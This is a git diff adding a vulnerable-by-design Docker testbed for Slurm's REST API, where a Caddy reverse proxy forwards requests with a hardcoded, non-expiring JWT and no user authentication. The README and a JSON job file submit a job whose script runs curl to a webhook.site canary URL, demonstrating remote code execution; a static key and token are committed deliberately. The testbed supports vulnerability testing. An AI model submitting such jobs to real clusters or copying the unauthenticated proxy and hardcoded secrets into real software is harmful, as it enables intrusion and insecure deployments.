diff --git a/slurm/exposed_rest_api/README.md b/slurm/exposed_rest_api/README.md new file mode 100644 index 00000000..58c1b29a --- /dev/null +++ b/slurm/exposed_rest_api/README.md @@ -0,0 +1,85 @@ +# Slurm Testbed + +## Overview +The Slurm Rest API requires authentication by default. However, a common configuration involves using a reverse proxy that (theoretically) should authenticate the user with some other methods and, if successful, authenticates towards the Slurm Rest API using an hardcoded JWT token that injected into the forwarded request's headers. + +This configuration is reported in the official documentation [here](https://slurm.schedmd.com/rest.html#auth_proxy) and with an implementation example [here](https://gitlab.com/SchedMD/training/docker-scale-out/-/tree/production/proxy). + +If the reverse proxy is misconfigured to simply forward the requests without any authentication steps, it will allow anyone to use the API and get RCE by submitting malicious jobs to the cluster. + +## This testbed + +To simulate an insecure Rest API proxy, a Caddy server is deployed in reverse-proxy mode on `127.0.0.1:8080`. The reverse proxy authenticates with the Slurm Rest API via a pre-generated JWT token with no expiration, this way there's no need to generate a new token every time the testbed is launched. + +The secure Slurm Rest API is also exposed on `127.0.0.1:6820` for testing purposes. + +## Testbed Setup + +To start the testbed, simply run `docker compose up` + +## Test the vulnerability +You can test the vulnerability by modifying the `script` field in the `rest_api_test.json` file to the desired command to execute. For example, you can get a canary URL from a service like [webhook.site](https://webhook.site) and run a curl command to receive a callback. Here's an example: +```json +{ + "job": { + "name": "test", + "ntasks": 1, + "current_working_directory": "/tmp", + "environment": [ + "PATH:/bin:/usr/bin/:/usr/local/bin/" + ] + }, + "script": "#!/bin/bash\ncurl https://webhook.site/11b9a510-d69d-4f51-9f93-5d236c72e6c1" +} +``` +Note: make sure to keep the shebang (`#!/bin/bash\n`) at the start of the string. + +Then you can submit the job using curl: +```sh +curl http://127.0.0.1:8080/slurm/v0.0.39/job/submit -H "Content-Type: application/json" -d @rest_api_test.json +``` + +A response from a vulnerable API will look like this: +```json +{ + "meta": { + "plugin": { + "type": "openapi\/v0.0.39", + "name": "Slurm OpenAPI v0.0.39", + "data_parser": "v0.0.39" + }, + "client": { + "source": "[api-proxy.slurm-testbed_slurm-testbed-network]:10988" + }, + "Slurm": { + "version": { + "major": 24, + "micro": 4, + "minor": 5 + }, + "release": "24.05.4" + } + }, + "errors": [], + "warnings": [], + "result": { + "job_id": 11, + "step_id": "batch", + "error_code": 0, + "error": "No error", + "job_submit_user_msg": "" + }, + "job_id": 11, + "step_id": "batch", + "job_submit_user_msg": "" +} +``` + +To check a non-vulnerable API, you can send the request to the original Rest API on port 6820, which requires authentication by default, therefore not vulnerable: +```sh +curl http://127.0.0.1:6820/slurm/v0.0.39/job/submit -H "Content-Type: application/json" -d @rest_api_test.json + +Authentication failure +``` + +As you can see, the authentication fails and the request is rejected. \ No newline at end of file diff --git a/slurm/exposed_rest_api/docker-compose.yml b/slurm/exposed_rest_api/docker-compose.yml new file mode 100644 index 00000000..94a40d52 --- /dev/null +++ b/slurm/exposed_rest_api/docker-compose.yml @@ -0,0 +1,34 @@ +name: slurm-testbed +services: + slurm: + build: ./slurm + ports: + - 6820:6820 + networks: + - slurm-testbed-network + + api-proxy: + image: caddy:2.9-alpine + container_name: api-proxy + command: + - "caddy" + - "reverse-proxy" + - "--from" + - ":8080" + - "--to" + - "http://slurm:6820" + - "--header-up" + - "X-SLURM-USER-NAME: slurm" + - "--header-up" + - "X-SLURM-USER-TOKEN: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjM4Nzk4MDQ5MjQsImlhdCI6MTczMjMyMTI3OCwic3VuIjoicm9vdCJ9.lV0sZg_KGxSck90yxVJ52vWzeL_ldtqse_Fn10vWz_0" + - "--access-log" + ports: + - 8080:8080 + depends_on: + - "slurm" + networks: + - slurm-testbed-network + +networks: + slurm-testbed-network: + driver: bridge diff --git a/slurm/exposed_rest_api/rest_api_test.json b/slurm/exposed_rest_api/rest_api_test.json new file mode 100644 index 00000000..18631c60 --- /dev/null +++ b/slurm/exposed_rest_api/rest_api_test.json @@ -0,0 +1,11 @@ +{ + "job": { + "name": "test", + "ntasks": 1, + "current_working_directory": "/tmp", + "environment": [ + "PATH:/bin:/usr/bin/:/usr/local/bin/" + ] + }, + "script": "#!/bin/bash\ncurl https://webhook.site/11b9a510-d69d-4f51-9f93-5d236c72e6c1" +} diff --git a/slurm/exposed_rest_api/slurm/Dockerfile b/slurm/exposed_rest_api/slurm/Dockerfile new file mode 100644 index 00000000..2cc35dcb --- /dev/null +++ b/slurm/exposed_rest_api/slurm/Dockerfile @@ -0,0 +1,50 @@ +# Slurm 24 is not available in bookworm +FROM debian:trixie-slim + +ARG DEBIAN_FRONTEND=noninteractive + +RUN set -ex \ + && apt-get update -y \ + && apt-get install -y \ + slurm-wlm \ + slurmrestd \ + slurm-wlm-basic-plugins \ + slurm-wlm-jwt-plugin \ + munge \ + curl + +RUN mkdir -p /etc/sysconfig/slurm \ + /var/spool/slurm \ + /var/run/slurm \ + /var/lib/slurm \ + /var/log/slurm \ + /var/spool/slurm/statesave \ + /run/munge \ + /data +RUN touch /var/lib/slurm/node_state \ + /var/lib/slurm/front_end_state \ + /var/lib/slurm/job_state \ + /var/lib/slurm/resv_state \ + /var/lib/slurm/trigger_state \ + /var/lib/slurm/assoc_mgr_state \ + /var/lib/slurm/assoc_usage \ + /var/lib/slurm/qos_usage \ + /var/lib/slurm/fed_mgr_state + +# Generate key for JWT authentication +# RUN dd if=/dev/random of=/var/spool/slurm/statesave/jwt_hs256.key bs=32 count=1 + +# Let's use a static JWT key for testing +COPY jwt_hs256.key /var/spool/slurm/statesave/jwt_hs256.key + +# Set permissions +RUN chown -R slurm:slurm /var/*/slurm* +RUN chown -R munge:munge /run/munge +RUN chmod 0600 /var/spool/slurm/statesave/jwt_hs256.key \ + && chmod 0755 /var/spool/slurm/statesave + +COPY slurm.conf /etc/slurm/slurm.conf +COPY cgroup.conf /etc/slurm/cgroup.conf + +COPY entrypoint.sh /entrypoint.sh +ENTRYPOINT ["/entrypoint.sh"] \ No newline at end of file diff --git a/slurm/exposed_rest_api/slurm/cgroup.conf b/slurm/exposed_rest_api/slurm/cgroup.conf new file mode 100644 index 00000000..2ad107f5 --- /dev/null +++ b/slurm/exposed_rest_api/slurm/cgroup.conf @@ -0,0 +1,2 @@ +CgroupPlugin=disabled +IgnoreSystemd=yes \ No newline at end of file diff --git a/slurm/exposed_rest_api/slurm/entrypoint.sh b/slurm/exposed_rest_api/slurm/entrypoint.sh new file mode 100755 index 00000000..2239a974 --- /dev/null +++ b/slurm/exposed_rest_api/slurm/entrypoint.sh @@ -0,0 +1,23 @@ +#!/bin/bash +set -e + +# Start munge +service munge start +sleep 1 + +# Start slurmctld and wait for it to start +/usr/sbin/slurmctld -i -Dvv & +sleep 2 +until 2>/dev/null >/dev/tcp/127.0.0.1/6817 +do + echo "Waiting for slurmctld to start" + sleep 2 +done + +# Start slurmd (worker process) +/usr/sbin/slurmd -Dvv & + +# Start slurmrestd +export SLURM_JWT="daemon" +export SLURMRESTD_SECURITY="disable_unshare_files,disable_unshare_sysv,disable_user_check" +/usr/sbin/slurmrestd 0.0.0.0:6820 -a rest_auth/jwt -vv \ No newline at end of file diff --git a/slurm/exposed_rest_api/slurm/jwt_hs256.key b/slurm/exposed_rest_api/slurm/jwt_hs256.key new file mode 100644 index 00000000..bd4d9c9f --- /dev/null +++ b/slurm/exposed_rest_api/slurm/jwt_hs256.key @@ -0,0 +1 @@ +"w/*i- w1Q OM6Fj_͏ \ No newline at end of file diff --git a/slurm/exposed_rest_api/slurm/slurm.conf b/slurm/exposed_rest_api/slurm/slurm.conf new file mode 100644 index 00000000..1769d199 --- /dev/null +++ b/slurm/exposed_rest_api/slurm/slurm.conf @@ -0,0 +1,51 @@ +# slurm.conf +# +# See the slurm.conf man page for more information. +# +ClusterName=linux +ControlMachine=localhost +ControlAddr=localhost +SlurmctldPort=6817 +SlurmdPort=6818 +AuthType=auth/munge +AuthAltTypes=auth/jwt +AuthAltParameters=jwt_key=/var/spool/slurm/statesave/jwt_hs256.key +StateSaveLocation=/var/lib/slurm +SlurmdSpoolDir=/var/spool/slurm +SwitchType=switch/none +MpiDefault=none +SlurmctldPidFile=/var/run/slurm/slurmctld.pid +SlurmdPidFile=/var/run/slurm/slurmd.pid +ProctrackType=proctrack/linuxproc +ReturnToService=0 +# +# TIMERS +SlurmctldTimeout=300 +SlurmdTimeout=300 +InactiveLimit=0 +MinJobAge=300 +KillWait=30 +Waittime=0 +# +# SCHEDULING +SchedulerType=sched/backfill +SelectType=select/cons_tres +SelectTypeParameters=CR_CPU_Memory +# +# LOGGING +SlurmctldDebug=3 +SlurmctldLogFile=/var/log/slurm/slurmctld.log +SlurmdDebug=3 +SlurmdLogFile=/var/log/slurm/slurmd.log +JobCompType=jobcomp/filetxt +JobCompLoc=/var/log/slurm/jobcomp.log +# +# ACCOUNTING +JobAcctGatherType=jobacct_gather/linux +JobAcctGatherFrequency=30 +# +# COMPUTE NODES +NodeName=localhost RealMemory=1000 State=UNKNOWN +# +# PARTITIONS +PartitionName=normal Default=yes Nodes=localhost Priority=50 DefMemPerCPU=500 Shared=NO MaxNodes=2 MaxTime=5-00:00:00 DefaultTime=5-00:00:00 State=UP